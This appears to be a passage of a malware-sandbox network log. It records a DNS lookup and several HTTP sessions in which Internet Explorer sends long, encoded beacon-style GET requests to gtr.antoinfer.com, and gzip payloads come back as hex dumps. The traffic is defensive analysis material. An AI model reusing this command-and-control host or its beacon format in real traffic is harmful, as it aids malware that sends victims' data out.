Jul 5, 2021 16:53:21.498718977 CEST	8.8.8.8	192.168.2.3	0x856d	No error (0)	gtr.antoinfer.com		165.232.183.49	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gtr.antoinfer.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49721	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2021 16:53:08.812254906 CEST	1174	OUT	GET /TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 5, 2021 16:53:09.719300032 CEST	1175	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Jul 2021 14:53:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a b7 76 83 40 14 05 3f 88 42 20 72 49 ce 39 d3 91 a3 c8 f9 eb 8d 1b 15 b2 8f 81 dd b7 f7 ce c8 72 39 e8 d6 a9 86 e5 74 ed b0 bb d2 dd 64 5d 14 d5 d4 9e 1d 9a 37 7c 39 e5 c5 6e 94 f4 ef 8a 17 0b df b5 5e df 85 5e 78 d3 7e 79 ed b6 c2 0f 97 b6 5d 63 85 46 9f 56 a0 0b 9e 0a d8 e1 80 c7 8a fe 90 8f 6b 93 d1 21 e4 13 b7 79 9f 5a 66 97 31 33 94 e4 a4 8b 10 da 9d ef 57 8d 00 1b bc 34 b0 b0 18 64 fe 52 b2 7c 47 65 d0 91 f5 0d 07 85 3c 4f be 2c 9c 06 2e 32 c0 35 c1 72 f8 68 e1 8e 6d 8a 2a 66 2b 0e 4e 92 35 59 e2 57 94 5c 6f 08 35 9b e5 7d d1 ed 42 bc 59 21 ec c0 ad 41 6c 61 16 fb 52 1f 88 96 3f d6 8c 55 ab f9 dc ef eb 5a 6a c1 7a 20 b3 91 7e 7c a6 dd 3b 03 9a 9d 8d 7d 64 a3 b0 8c 80 13 9c c9 61 09 5e 55 40 48 29 ee 47 ab f1 93 0e e2 ec e9 c6 8e d2 ea 0f 53 da 79 ce 81 7b 1f 3a e3 68 7f a2 53 44 dc 6f d5 b7 cf a8 8f 34 2d c0 b4 a2 4a 7a 6c ca b5 97 35 ef 7b 48 0e 93 34 b1 46 0c 9e 11 ae 11 46 bc e4 38 e8 d7 fa 79 62 dd 8f 19 37 af e8 e6 c9 0d c2 e1 26 11 7a 1c 9e f4 37 d1 e5 3c ba 6c 17 8a 12 02 97 d0 a6 82 d3 10 d3 f8 e7 c8 d1 b2 17 f4 e0 1e 19 70 a8 21 0e b9 d2 52 b1 9a c4 20 f1 f6 80 46 c3 03 b7 44 85 28 e3 ca e3 77 b7 e6 28 52 34 1b f8 11 84 2c 13 46 85 fd 5e 9e fb 84 a6 a5 38 82 6b 9f 2e b2 da 16 df 88 86 3c dd e1 17 bb 64 83 bc da 36 f2 43 b3 5a 66 83 fc 1d 04 38 25 79 83 6a be d3 d8 0f 9c 4b 2e 77 9d 11 43 13 fb ec cb 1c 14 40 63 c3 c1 85 1e db 81 75 85 65 82 29 96 85 d6 98 c4 62 3f b9 fd 52 0c 9a 75 62 d9 1e 29 57 76 c2 7d 9b 39 02 67 f8 c7 6b d7 29 2d ad 44 9e a3 f1 b8 28 6e e4 ac 58 f3 f7 72 bc 9e 47 4b 77 10 2c 44 57 c9 2b 8f c6 3a b6 b7 7e 7b d6 0c 40 9c 23 3e 31 30 7b 8a ed a3 32 c4 90 81 d6 96 e5 50 32 ef 17 0f a3 d8 c3 73 6b 8b 89 e4 2e db 99 81 8d 99 7c c1 63 99 f2 59 e7 22 39 90 bd 92 c0 2f 21 d9 e0 c2 15 de 4f dc a2 6f 82 80 1d 3a 72 48 79 5c 41 35 b6 12 c4 fe 74 79 83 c1 dd 21 db 08 03 18 a6 b1 af a5 a9 72 2c b4 08 82 84 41 86 9e 9c 5b 99 7c cc 05 38 e8 01 eb 99 38 4e 87 63 fb ca 4f c8 cc 5d c7 45 a3 4c b6 21 f0 5a b4 37 3f 0a 78 08 87 35 ce cd 6a 83 f2 0c c8 96 8f cf 77 52 f0 12 53 e6 b5 a2 b9 20 36 7d e5 7c 78 1e dc b1 aa 19 7e 83 36 6c 37 62 36 0d 92 c7 c6 81 7e ab a7 af 91 8c e7 63 c5 7d 46 ae b7 be ae 16 72 9b c8 21 70 71 ee 64 fd 91 b7 88 e9 d2 01 39 a2 65 3f d7 fe 3a 34 a7 09 f1 48 2d b7 8a 94 f9 4d 98 61 3a df f3 10 be 91 60 88 2f 34 e5 98 25 5f b4 76 8d fb 75 26 07 7e 7c 3e c7 83 e1 97 00 1d 24 c0 6b 54 c6 da a5 4a 7e 81 51 c3 24 39 5d 4e 3d ae f4 6f 14 7d 69 50 1e c4 06 75 f2 99 68 85 99 c4 93 91 f4 e8 73 54 30 1a 27 0c bb 15 1f 26 66 aa d4 7c 0c e5 eb 3b ad 82 a1 3b 64 96 c9 57 00 43 51 9e 4c de 1a 65 b3 7d 3c 49 04 67 4f e3 e2 df 64 a6 de 1c b6 d1 5c b4 4a 27 4d 2e 61 ef c0 e9 d4 1c eb c4 00 fb 69 58 9e 0f a1 6f e3 1d 9a 9a fc a6 d0 54 1f 07 63 7a f5 86 ef 3d b2 af ea 70 f0 e1 1e fd f1 70 3b 65 f9 31 e0 ce 18 53 da fa 21 b0 73 3b a3 58 d2 a9 76 bf 8c df ea 1e 3a 6b 71 19 9c 4b c1 59 b5 4f f5 2a dc 18 18 04 f4 1f 8e 22 32 ea a3 39 63 d0 82 88 cf e2 a1 77 69 2b 32 26 fa 79 e8 b1 e5 6b 63 30 dd cf 4a 15 4b 06 b8 38 21 68 cd ed 6a 1d 62 7d 96 41 89 47 8c a0 97 cf 3e 3e ed 54 e5 1c cb Data Ascii: 2000v@?B rI9r9td]7\|9n^^x~y]cFVk!yZf13W4dR\|Ge<O,.25rhmf+N5YW\o5}BY!AlaR?UZjz ~\|;}da^U@H)GSy{:hSDo4-Jzl5{H4FF8yb7&z7<lp!R FD(w(R4,F^8k.<d6CZf8%yjK.wC@cue)b?Rub)Wv}9gk)-D(nXrGKw,DW+:~{@#>10{2P2sk.\|cY"9/!Oo:rHy\A5ty!r,A[\|88NcO]EL!Z7?x5jwRS 6}\|x~6l7b6~c}Fr!pqd9e?:4H-Ma:`/4%_vu&~\|>$kTJ~Q$9]N=o}iPuhsT0'&f\|;;dWCQLe}<IgOd\J'M.aiXoTcz=pp;e1S!s;Xv:kqKYO"29cwi+2&ykc0JK8!hjb}AG>>T
Jul 5, 2021 16:53:09.719336987 CEST	1177	IN	Data Raw: b0 68 28 fb ca 64 02 0d 6b b8 85 cf 7c 56 10 9a 37 eb c0 fa d1 6b 5a 2d 99 0a 20 2e 5b c6 42 3f a7 48 2d fc 07 e5 ba 0e 88 62 31 9e 79 d1 fc 55 d1 81 91 32 5a 1e a4 0c 13 d2 05 f7 e0 0f 35 85 60 da cb d4 3a 3d 55 09 1d 28 48 50 da 02 0c 1b 54 9f Data Ascii: h(dk\|V7kZ- .[B?H-b1yU2Z5`:=U(HPT>ewk_VL?Aqhb2~}9bE!#x*N#g6):D4JLC.632bKpY.L\K\|dFWa>(UfXa
Jul 5, 2021 16:53:09.719362974 CEST	1178	IN	Data Raw: 35 94 de dd 6f 6c 2c 3f a2 a9 d2 d0 48 f0 59 bf 71 95 3e 00 08 36 ae a9 52 61 3e dc 9f fe 24 cd 1f 5f 95 df 52 91 ae 1c 9c ed 26 03 64 f9 18 2e dd d0 97 98 e5 31 8b 64 68 6b 75 59 b2 a0 82 59 6f 2c a9 fa 7c 9f 23 06 55 26 b9 1c 26 4f 17 8a 6d 25 Data Ascii: 5ol,?HYq>6Ra>$_R&d.1dhkuYYo,\|#U&&Om%'VU+%=F8J* ~@LUCa\|K]!Lc_r3xOx`G4pPGo\|4@\|ZaGVLJ'*
Jul 5, 2021 16:53:09.719458103 CEST	1180	IN	Data Raw: 71 51 8c 65 61 bf e9 49 f8 c1 7f 40 cb 67 08 d5 a9 88 32 fc 58 e8 e4 78 82 fa c4 c0 96 d8 00 cb 62 91 1a 06 4d 8d 2a bd 99 d1 f4 ea d7 20 d6 09 ce 6e 00 3d 3e c8 da 49 51 4e 28 63 d4 f0 8d 1a 01 30 db b0 3f aa 52 ab d6 93 29 7d 91 01 38 49 58 52 Data Ascii: qQeaI@g2XxbM* n=>IQN(c0?R)}8IXRQbpT:d8;(wkWm9iZ_E8z>C]fj@aj:2lD_9&>`sZf3s@EM{@u8;o`wvh#%Q
Jul 5, 2021 16:53:09.719484091 CEST	1181	IN	Data Raw: 16 00 d3 24 c0 27 e6 f1 a8 2e bb 6e fb e7 70 58 da 5b 4c 7d c8 9f d8 4c 99 7e 45 2c 8f ae 2f 8e bc db ef a4 f3 1d 44 74 89 bd 18 ea 59 4d 92 41 7b 5e 00 1a c8 0c 79 5a 74 fb a5 72 70 b8 ee 0e 0c d4 15 0d ab 56 da de 06 a3 a2 b5 21 81 86 59 59 2c Data Ascii: $'.npX[L}L~E,/DtYMA{^yZtrpV!YY,(4.g377`b9m\!TMl:glL113U+lhrUzt;ml^%&5P(b,GuM]\Eu{Ty.
Jul 5, 2021 16:53:09.719510078 CEST	1182	IN	Data Raw: 6f 63 97 47 d1 ae 98 56 00 02 01 19 9c 34 f8 88 22 bf 11 a5 25 ad dc 48 d6 d8 63 3b be ed 7a fd 45 60 5e f8 55 3f 31 d3 65 94 60 0d 4e bd 1d dc 22 b0 ad 83 c1 d7 1c 57 f0 70 d6 e9 e7 4e 45 27 f6 a8 46 8f 23 92 96 07 7f a4 85 41 65 ba 14 e5 7e 4d Data Ascii: ocGV4"%Hc;zE`^U?1e`N"WpNE'F#Ae~M.:?0/!Bx+_W^\}SB\=NQ-\qF2jY)\|Pdg~i hvi/kNnf9R_da>#>~n,2
Jul 5, 2021 16:53:09.721137047 CEST	1184	IN	Data Raw: ae 41 9c 26 c8 b9 37 c6 1a 7e 7a 48 b2 02 60 7e 7f f1 a1 c0 08 5f b9 64 f8 e4 ec ef 09 9c 92 14 62 21 ba a4 36 c2 63 b3 07 ac a9 21 6a 26 70 6a e8 f0 a0 23 a6 1a b5 8a 3d 24 13 be bf 99 0c b2 d2 a2 49 a2 b1 af af 9c 8c c5 8a c8 d6 ce 0c 5d a3 53 Data Ascii: A&7~zH`~_db!6c!j&pj#=$I]S .Vr&VH71a'JIz}TB#5"xjZ~R~G'_ 6zm'RgOU7NH4w`4/'G<\cMb2o`@$$
Jul 5, 2021 16:53:09.721170902 CEST	1185	IN	Data Raw: 77 83 df 9d 33 42 fa 14 a9 28 19 4a 73 08 c3 20 06 ed 9a 8e d8 c0 f3 07 17 c4 21 7c 62 e6 72 39 ec fb 38 dc 5e 04 1f 58 fb e5 95 46 4b 54 7c 9e e6 b4 03 d1 b7 76 6c 2e f8 62 a8 53 90 37 2a 94 08 ae 54 66 82 89 85 7b 65 c4 62 3c ae 18 28 eb 28 d3 Data Ascii: w3B(Js !\|br98^XFKT\|vl.bS7Tf{eb<((h%1PU@5pl^-1?BR:\|Fu4Lv18lZK(V!QV,jNDc'052TPMWQH ^}hK':*ufFi9qI
Jul 5, 2021 16:53:09.721195936 CEST	1186	IN	Data Raw: 7f f2 5a 13 af d3 45 93 e7 e3 f3 33 44 7f c2 a8 87 f4 76 4e f0 48 e5 47 ed 2b ef a0 f6 c1 1d 31 68 73 94 40 4e db 31 7c d0 30 f3 cc d3 0e 6b 5b 94 dc 7a 14 ec a3 45 02 ab 1e 7e c4 2a 9e f0 08 7b ab ee f4 ee ba 8a 07 bb 90 e3 fd be e4 f2 76 c0 5d Data Ascii: ZE3DvNHG+1hs@N1\|0k[zE~*{v]Pdg7jn=UlCi^]9`^'irW!Hr2U:>my<#9IO2i3E?Wpi4>hI6AV-m-<qQav0$x
Jul 5, 2021 16:53:09.721221924 CEST	1188	IN	Data Raw: 5b bb 73 e8 f4 92 2e 99 ee 15 2f 0f d9 cd 32 1e 60 64 89 d0 13 8d df 13 96 1b 87 66 3b c8 db b9 0b 27 09 a0 02 e3 6b 6e 16 02 2f bf b7 b2 45 f5 5a e4 36 a9 dc 16 17 b3 4f a0 fa c5 90 4d ae 4c 41 ab 59 1b 6f 3a 93 b3 fa eb bd 06 fd 0e 1e b8 3f 8a Data Ascii: [s./2`df;'kn/EZ6OMLAYo:?r_[Ne\X*9Nt&lV{c%9v\|~SlV'6+oT[YcQB-~BD@!hxMO<BJ?!f,NJ;I4"vd<+K
Jul 5, 2021 16:53:09.905205965 CEST	1189	IN	Data Raw: 5c 06 5d 25 e1 8c cc b7 db 05 02 76 4d ed 07 9d c0 eb a6 85 2c f1 17 fe f9 11 1f b9 67 3e e0 94 f4 2b e0 6e 23 92 c1 52 9e 13 5a f6 59 fa d5 d6 c8 8d ad 1e 71 2d 9e 84 20 8b fc ab af d5 0f 93 14 a0 94 eb 93 c1 63 28 ca 6f 9f 8c 6a 17 29 f3 45 71 Data Ascii: \]%vM,g>+n#RZYq- c(oj)EqR)8Z_8p3.~'2bdV:c=qalHr8;[!{?vMPQtbCzWSFnb?vFpBXc<tzSOfVE"5=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49723	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2021 16:53:10.181782961 CEST	1234	OUT	GET /L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 5, 2021 16:53:11.091167927 CEST	1382	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Jul 2021 14:53:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a b7 76 83 40 14 05 3f 88 42 20 72 49 ce 39 d3 91 a3 c8 f9 eb 8d 1b 15 b2 8f 81 dd b7 f7 ce c8 72 39 e8 d6 a9 86 e5 74 ed b0 bb d2 dd 64 5d 14 d5 d4 9e 1d 9a 37 7c 39 e5 c5 6e 94 f4 ef 8a 17 0b df b5 5e df 85 5e 78 d3 7e 79 ed b6 c2 0f 97 b6 5d 63 85 46 9f 56 a0 0b 9e 0a d8 e1 80 c7 8a fe 90 8f 6b 93 d1 21 e4 13 b7 79 9f 5a 66 97 31 33 94 e4 a4 8b 10 da 9d ef 57 8d 00 1b bc 34 b0 b0 18 64 fe 52 b2 7c 47 65 d0 91 f5 0d 07 85 3c 4f be 2c 9c 06 2e 32 c0 35 c1 72 f8 68 e1 8e 6d 8a 2a 66 2b 0e 4e 92 35 59 e2 57 94 5c 6f 08 35 9b e5 7d d1 ed 42 bc 59 21 ec c0 ad 41 6c 61 16 fb 52 1f 88 96 3f d6 8c 55 ab f9 dc ef eb 5a 6a c1 7a 20 b3 91 7e 7c a6 dd 3b 03 9a 9d 8d 7d 64 a3 b0 8c 80 13 9c c9 61 09 5e 55 40 48 29 ee 47 ab f1 93 0e e2 ec e9 c6 8e d2 ea 0f 53 da 79 ce 81 7b 1f 3a e3 68 7f a2 53 44 dc 6f d5 b7 cf a8 8f 34 2d c0 b4 a2 4a 7a 6c ca b5 97 35 ef 7b 48 0e 93 34 b1 46 0c 9e 11 ae 11 46 bc e4 38 e8 d7 fa 79 62 dd 8f 19 37 af e8 e6 c9 0d c2 e1 26 11 7a 1c 9e f4 37 d1 e5 3c ba 6c 17 8a 12 02 97 d0 a6 82 d3 10 d3 f8 e7 c8 d1 b2 17 f4 e0 1e 19 70 a8 21 0e b9 d2 52 b1 9a c4 20 f1 f6 80 46 c3 03 b7 44 85 28 e3 ca e3 77 b7 e6 28 52 34 1b f8 11 84 2c 13 46 85 fd 5e 9e fb 84 a6 a5 38 82 6b 9f 2e b2 da 16 df 88 86 3c dd e1 17 bb 64 83 bc da 36 f2 43 b3 5a 66 83 fc 1d 04 38 25 79 83 6a be d3 d8 0f 9c 4b 2e 77 9d 11 43 13 fb ec cb 1c 14 40 63 c3 c1 85 1e db 81 75 85 65 82 29 96 85 d6 98 c4 62 3f b9 fd 52 0c 9a 75 62 d9 1e 29 57 76 c2 7d 9b 39 02 67 f8 c7 6b d7 29 2d ad 44 9e a3 f1 b8 28 6e e4 ac 58 f3 f7 72 bc 9e 47 4b 77 10 2c 44 57 c9 2b 8f c6 3a b6 b7 7e 7b d6 0c 40 9c 23 3e 31 30 7b 8a ed a3 32 c4 90 81 d6 96 e5 50 32 ef 17 0f a3 d8 c3 73 6b 8b 89 e4 2e db 99 81 8d 99 7c c1 63 99 f2 59 e7 22 39 90 bd 92 c0 2f 21 d9 e0 c2 15 de 4f dc a2 6f 82 80 1d 3a 72 48 79 5c 41 35 b6 12 c4 fe 74 79 83 c1 dd 21 db 08 03 18 a6 b1 af a5 a9 72 2c b4 08 82 84 41 86 9e 9c 5b 99 7c cc 05 38 e8 01 eb 99 38 4e 87 63 fb ca 4f c8 cc 5d c7 45 a3 4c b6 21 f0 5a b4 37 3f 0a 78 08 87 35 ce cd 6a 83 f2 0c c8 96 8f cf 77 52 f0 12 53 e6 b5 a2 b9 20 36 7d e5 7c 78 1e dc b1 aa 19 7e 83 36 6c 37 62 36 0d 92 c7 c6 81 7e ab a7 af 91 8c e7 63 c5 7d 46 ae b7 be ae 16 72 9b c8 21 70 71 ee 64 fd 91 b7 88 e9 d2 01 39 a2 65 3f d7 fe 3a 34 a7 09 f1 48 2d b7 8a 94 f9 4d 98 61 3a df f3 10 be 91 60 88 2f 34 e5 98 25 5f b4 76 8d fb 75 26 07 7e 7c 3e c7 83 e1 97 00 1d 24 c0 6b 54 c6 da a5 4a 7e 81 51 c3 24 39 5d 4e 3d ae f4 6f 14 7d 69 50 1e c4 06 75 f2 99 68 85 99 c4 93 91 f4 e8 73 54 30 1a 27 0c bb 15 1f 26 66 aa d4 7c 0c e5 eb 3b ad 82 a1 3b 64 96 c9 57 00 43 51 9e 4c de 1a 65 b3 7d 3c 49 04 67 4f e3 e2 df 64 a6 de 1c b6 d1 5c b4 4a 27 4d 2e 61 ef c0 e9 d4 1c eb c4 00 fb 69 58 9e 0f a1 6f e3 1d 9a 9a fc a6 d0 54 1f 07 63 7a f5 86 ef 3d b2 af ea 70 f0 e1 1e fd f1 70 3b 65 f9 31 e0 ce 18 53 da fa 21 b0 73 3b a3 58 d2 a9 76 bf 8c df ea 1e 3a 6b 71 19 9c 4b c1 59 b5 4f f5 2a dc 18 18 04 f4 1f 8e 22 32 ea a3 39 63 d0 82 88 cf e2 a1 77 69 2b 32 26 fa 79 e8 b1 e5 6b 63 30 dd cf 4a 15 4b 06 b8 38 21 68 cd ed 6a 1d 62 7d 96 41 89 47 8c a0 97 cf 3e 3e ed 54 e5 1c cb Data Ascii: 2000v@?B rI9r9td]7\|9n^^x~y]cFVk!yZf13W4dR\|Ge<O,.25rhmf+N5YW\o5}BY!AlaR?UZjz ~\|;}da^U@H)GSy{:hSDo4-Jzl5{H4FF8yb7&z7<lp!R FD(w(R4,F^8k.<d6CZf8%yjK.wC@cue)b?Rub)Wv}9gk)-D(nXrGKw,DW+:~{@#>10{2P2sk.\|cY"9/!Oo:rHy\A5ty!r,A[\|88NcO]EL!Z7?x5jwRS 6}\|x~6l7b6~c}Fr!pqd9e?:4H-Ma:`/4%_vu&~\|>$kTJ~Q$9]N=o}iPuhsT0'&f\|;;dWCQLe}<IgOd\J'M.aiXoTcz=pp;e1S!s;Xv:kqKYO"29cwi+2&ykc0JK8!hjb}AG>>T
Jul 5, 2021 16:53:11.091238022 CEST	1384	IN	Data Raw: b0 68 28 fb ca 64 02 0d 6b b8 85 cf 7c 56 10 9a 37 eb c0 fa d1 6b 5a 2d 99 0a 20 2e 5b c6 42 3f a7 48 2d fc 07 e5 ba 0e 88 62 31 9e 79 d1 fc 55 d1 81 91 32 5a 1e a4 0c 13 d2 05 f7 e0 0f 35 85 60 da cb d4 3a 3d 55 09 1d 28 48 50 da 02 0c 1b 54 9f Data Ascii: h(dk\|V7kZ- .[B?H-b1yU2Z5`:=U(HPT>ewk_VL?Aqhb2~}9bE!#x*N#g6):D4JLC.632bKpY.L\K\|dFWa>(UfXa
Jul 5, 2021 16:53:11.091279030 CEST	1385	IN	Data Raw: 35 94 de dd 6f 6c 2c 3f a2 a9 d2 d0 48 f0 59 bf 71 95 3e 00 08 36 ae a9 52 61 3e dc 9f fe 24 cd 1f 5f 95 df 52 91 ae 1c 9c ed 26 03 64 f9 18 2e dd d0 97 98 e5 31 8b 64 68 6b 75 59 b2 a0 82 59 6f 2c a9 fa 7c 9f 23 06 55 26 b9 1c 26 4f 17 8a 6d 25 Data Ascii: 5ol,?HYq>6Ra>$_R&d.1dhkuYYo,\|#U&&Om%'VU+%=F8J* ~@LUCa\|K]!Lc_r3xOx`G4pPGo\|4@\|ZaGVLJ'*
Jul 5, 2021 16:53:11.091315985 CEST	1386	IN	Data Raw: 71 51 8c 65 61 bf e9 49 f8 c1 7f 40 cb 67 08 d5 a9 88 32 fc 58 e8 e4 78 82 fa c4 c0 96 d8 00 cb 62 91 1a 06 4d 8d 2a bd 99 d1 f4 ea d7 20 d6 09 ce 6e 00 3d 3e c8 da 49 51 4e 28 63 d4 f0 8d 1a 01 30 db b0 3f aa 52 ab d6 93 29 7d 91 01 38 49 58 52 Data Ascii: qQeaI@g2XxbM* n=>IQN(c0?R)}8IXRQbpT:d8;(wkWm9iZ_E8z>C]fj@aj:2lD_9&>`sZf3s@EM{@u8;o`wvh#%Q
Jul 5, 2021 16:53:11.091355085 CEST	1388	IN	Data Raw: 16 00 d3 24 c0 27 e6 f1 a8 2e bb 6e fb e7 70 58 da 5b 4c 7d c8 9f d8 4c 99 7e 45 2c 8f ae 2f 8e bc db ef a4 f3 1d 44 74 89 bd 18 ea 59 4d 92 41 7b 5e 00 1a c8 0c 79 5a 74 fb a5 72 70 b8 ee 0e 0c d4 15 0d ab 56 da de 06 a3 a2 b5 21 81 86 59 59 2c Data Ascii: $'.npX[L}L~E,/DtYMA{^yZtrpV!YY,(4.g377`b9m\!TMl:glL113U+lhrUzt;ml^%&5P(b,GuM]\Eu{Ty.
Jul 5, 2021 16:53:11.091392040 CEST	1389	IN	Data Raw: 6f 63 97 47 d1 ae 98 56 00 02 01 19 9c 34 f8 88 22 bf 11 a5 25 ad dc 48 d6 d8 63 3b be ed 7a fd 45 60 5e f8 55 3f 31 d3 65 94 60 0d 4e bd 1d dc 22 b0 ad 83 c1 d7 1c 57 f0 70 d6 e9 e7 4e 45 27 f6 a8 46 8f 23 92 96 07 7f a4 85 41 65 ba 14 e5 7e 4d Data Ascii: ocGV4"%Hc;zE`^U?1e`N"WpNE'F#Ae~M.:?0/!Bx+_W^\}SB\=NQ-\qF2jY)\|Pdg~i hvi/kNnf9R_da>#>~n,2
Jul 5, 2021 16:53:11.093312979 CEST	1391	IN	Data Raw: ae 41 9c 26 c8 b9 37 c6 1a 7e 7a 48 b2 02 60 7e 7f f1 a1 c0 08 5f b9 64 f8 e4 ec ef 09 9c 92 14 62 21 ba a4 36 c2 63 b3 07 ac a9 21 6a 26 70 6a e8 f0 a0 23 a6 1a b5 8a 3d 24 13 be bf 99 0c b2 d2 a2 49 a2 b1 af af 9c 8c c5 8a c8 d6 ce 0c 5d a3 53 Data Ascii: A&7~zH`~_db!6c!j&pj#=$I]S .Vr&VH71a'JIz}TB#5"xjZ~R~G'_ 6zm'RgOU7NH4w`4/'G<\cMb2o`@$$
Jul 5, 2021 16:53:11.093354940 CEST	1392	IN	Data Raw: 77 83 df 9d 33 42 fa 14 a9 28 19 4a 73 08 c3 20 06 ed 9a 8e d8 c0 f3 07 17 c4 21 7c 62 e6 72 39 ec fb 38 dc 5e 04 1f 58 fb e5 95 46 4b 54 7c 9e e6 b4 03 d1 b7 76 6c 2e f8 62 a8 53 90 37 2a 94 08 ae 54 66 82 89 85 7b 65 c4 62 3c ae 18 28 eb 28 d3 Data Ascii: w3B(Js !\|br98^XFKT\|vl.bS7Tf{eb<((h%1PU@5pl^-1?BR:\|Fu4Lv18lZK(V!QV,jNDc'052TPMWQH ^}hK':*ufFi9qI
Jul 5, 2021 16:53:11.093393087 CEST	1394	IN	Data Raw: 7f f2 5a 13 af d3 45 93 e7 e3 f3 33 44 7f c2 a8 87 f4 76 4e f0 48 e5 47 ed 2b ef a0 f6 c1 1d 31 68 73 94 40 4e db 31 7c d0 30 f3 cc d3 0e 6b 5b 94 dc 7a 14 ec a3 45 02 ab 1e 7e c4 2a 9e f0 08 7b ab ee f4 ee ba 8a 07 bb 90 e3 fd be e4 f2 76 c0 5d Data Ascii: ZE3DvNHG+1hs@N1\|0k[zE~*{v]Pdg7jn=UlCi^]9`^'irW!Hr2U:>my<#9IO2i3E?Wpi4>hI6AV-m-<qQav0$x
Jul 5, 2021 16:53:11.093430996 CEST	1395	IN	Data Raw: 5b bb 73 e8 f4 92 2e 99 ee 15 2f 0f d9 cd 32 1e 60 64 89 d0 13 8d df 13 96 1b 87 66 3b c8 db b9 0b 27 09 a0 02 e3 6b 6e 16 02 2f bf b7 b2 45 f5 5a e4 36 a9 dc 16 17 b3 4f a0 fa c5 90 4d ae 4c 41 ab 59 1b 6f 3a 93 b3 fa eb bd 06 fd 0e 1e b8 3f 8a Data Ascii: [s./2`df;'kn/EZ6OMLAYo:?r_[Ne\X*9Nt&lV{c%9v\|~SlV'6+oT[YcQB-~BD@!hxMO<BJ?!f,NJ;I4"vd<+K
Jul 5, 2021 16:53:11.281783104 CEST	1397	IN	Data Raw: 5c 06 5d 25 e1 8c cc b7 db 05 02 76 4d ed 07 9d c0 eb a6 85 2c f1 17 fe f9 11 1f b9 67 3e e0 94 f4 2b e0 6e 23 92 c1 52 9e 13 5a f6 59 fa d5 d6 c8 8d ad 1e 71 2d 9e 84 20 8b fc ab af d5 0f 93 14 a0 94 eb 93 c1 63 28 ca 6f 9f 8c 6a 17 29 f3 45 71 Data Ascii: \]%vM,g>+n#RZYq- c(oj)EqR)8Z_8p3.~'2bdV:c=qalHr8;[!{?vMPQtbCzWSFnb?vFpBXc<tzSOfVE"5=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49722	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2021 16:53:11.231460094 CEST	1395	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 5, 2021 16:53:11.772002935 CEST	1487	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 05 Jul 2021 14:53:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49724	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

